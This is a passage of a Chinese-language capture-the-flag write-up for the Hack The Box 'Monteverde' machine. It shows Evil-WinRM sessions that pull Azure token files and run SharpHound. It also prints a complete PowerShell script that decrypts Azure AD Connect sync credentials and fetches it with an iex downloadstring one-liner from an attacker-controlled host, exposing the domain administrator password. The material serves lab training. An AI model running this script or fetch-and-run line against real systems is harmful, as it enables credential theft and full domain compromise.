*Evil-WinRM* PS C:\Users\mhope\.azure> 
*Evil-WinRM* PS C:\Users\mhope\.azure> download AzurePSDataCollectionProfile.json
                                        
Info: Downloading C:\Users\mhope\.azure\AzurePSDataCollectionProfile.json to AzurePSDataCollectionProfile.json
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\mhope\.azure> download AzureRmContext.json
                                        
Info: Downloading C:\Users\mhope\.azure\AzureRmContext.json to AzureRmContext.json
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\mhope\.azure>
*Evil-WinRM* PS C:\Users\mhope\.azure> download AzureRmContextSettings.json
                                        
Info: Downloading C:\Users\mhope\.azure\AzureRmContextSettings.json to AzureRmContextSettings.json
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\mhope\.azure> download TokenCache.dat
                                        
Info: Downloading C:\Users\mhope\.azure\TokenCache.dat to TokenCache.dat
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\mhope\.azure>

http:\sh1yan.top\photo\Monteverde-htb-writeup/111.txt.json

19、奈何水平太差,没有啥发现,我就特意上传下bloodhound工具进行枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
*Evil-WinRM* PS C:\Users\mhope\Desktop> upload /home/kali/Desktop/tools/SharpHound/SharpHound.exe
                                        
Info: Uploading /home/kali/Desktop/tools/SharpHound/SharpHound.exe to C:\Users\mhope\Desktop\SharpHound.exe
                                        
Data: 1395368 bytes of 1395368 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Desktop> .\SharpHound.exe -c all -d MEGABANK.LOCAL
2024-05-11T02:37:34.9091996-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-05-11T02:37:35.0185807-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-05-11T02:37:35.0343284-07:00|INFORMATION|Initializing SharpHound at 2:37 AM on 5/11/2024
2024-05-11T02:37:37.7060717-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for MEGABANK.LOCAL : MONTEVERDE.MEGABANK.LOCAL
2024-05-11T02:37:38.0341967-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-05-11T02:37:38.1279490-07:00|INFORMATION|Beginning LDAP search for MEGABANK.LOCAL
2024-05-11T02:37:38.1592002-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-05-11T02:37:38.1592002-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-05-11T02:38:08.1748588-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2024-05-11T02:38:23.4560715-07:00|INFORMATION|Consumers finished, closing output channel
2024-05-11T02:38:23.4716995-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-05-11T02:38:23.5810726-07:00|INFORMATION|Status: 121 objects finished (+121 2.688889)/s -- Using 43 MB RAM
2024-05-11T02:38:23.5810726-07:00|INFORMATION|Enumeration finished in 00:00:45.4458643
2024-05-11T02:38:23.6279476-07:00|INFORMATION|Saving cache with stats: 79 ID to type mappings.
 79 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-05-11T02:38:23.6435734-07:00|INFORMATION|SharpHound Enumeration Completed at 2:38 AM on 5/11/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\mhope\Desktop> ls


    Directory: C:\Users\mhope\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/11/2024   2:38 AM          13457 20240511023823_BloodHound.zip
-a----        5/11/2024   2:38 AM          11927 MmU4ODNmNTctYjM2MS00N2U1LWI5NjctNDg2N2E5YmZmZmEx.bin
-a----        5/11/2024   2:31 AM         276992 Rubeus.exe
-a----        5/11/2024   2:36 AM        1046528 SharpHound.exe
-ar---        5/10/2024  11:57 PM             34 user.txt
-a----        5/11/2024   2:04 AM        2387456 winPEASx64.exe


*Evil-WinRM* PS C:\Users\mhope\Desktop> download 20240511023823_BloodHound.zip
                                        
Info: Downloading C:\Users\mhope\Desktop\20240511023823_BloodHound.zip to 20240511023823_BloodHound.zip
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\mhope\Desktop>

20、整体分析下来,感觉这里没有路,我继续回到一开始那个权限组里

Azure Admins

https://book.hacktricks.xyz/v/cn/windows-hardening/windows-local-privilege-escalation

1
Monteverde 是一台中型 Windows 计算机,具有 Azure AD Connect 功能。枚举域并创建用户列表。通过密码喷射,发现“SABatchJobs”服务帐户将用户名作为密码。使用此服务帐户,可以枚举系统上的 SMB 共享,并且发现“$users”共享是世界可读的。用于 Azure AD 帐户的 XML 文件位于用户文件夹中,并且包含密码。由于密码重用,我们可以使用 WinRM 作为“mhope”连接到域控制器。枚举显示已安装“Azure AD Connect”。可以提取将目录更改复制到 Azure 的帐户(在本例中为默认域管理员)的凭据。

21、下面的步骤就是利用的步骤,我是不行了,一点都没接触过,只能参考演练报告了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
*Evil-WinRM* PS C:\Users\mhope\Documents> cd C:\"Program Files"
*Evil-WinRM* PS C:\Program Files> ls *Azure*


    Directory: C:\Program Files


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/2/2020   2:51 PM                Microsoft Azure Active Directory Connect
d-----         1/2/2020   3:37 PM                Microsoft Azure Active Directory Connect Upgrader
d-----         1/2/2020   3:02 PM                Microsoft Azure AD Connect Health Sync Agent
d-----         1/2/2020   2:53 PM                Microsoft Azure AD Sync


*Evil-WinRM* PS C:\Program Files> 


https://blog.xpnsec.com/azuread-connect-for-redteam/


iex(new-object net.webclient).downloadstring('http://10.10.14.16/Get-MSOLCredentials.ps1')


┌──(kali㉿offsec)-[~/Desktop]
└─$ cat Get-MSOLCredentials.ps1 
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=127.0.0.1;Database=ADSync;Integrated Security=True"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}
Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)



┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 80                                
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.172 - - [12/May/2024 04:31:52] "GET /Get-MSOLCredentials.ps1 HTTP/1.1" 200 -



*Evil-WinRM* PS C:\Program Files> cd C:\Users\mhope\Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.14.16/Get-MSOLCredentials.ps1')
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!
*Evil-WinRM* PS C:\Users\mhope\Desktop>

http:\sh1yan.top\photo\Monteverde-htb-writeup/Get-MSOLCredentials.ps1

22、这里利用里,我们获取到了最后的账号密码,我们直接那最后的flag吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.172 -u administrator -p 'd0m@in4dminyeah!'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        5/10/2024  11:57 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
6f9d52cc95e11d46a4ac2aa7b85ae634
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/223

打靶记
#shooting-range
Monteverde-htb-writeup
https://sh1yan.top/2024/05/11/Monteverde-htb-writeup/
作者
shiyan
发布于
2024年5月11日
许可协议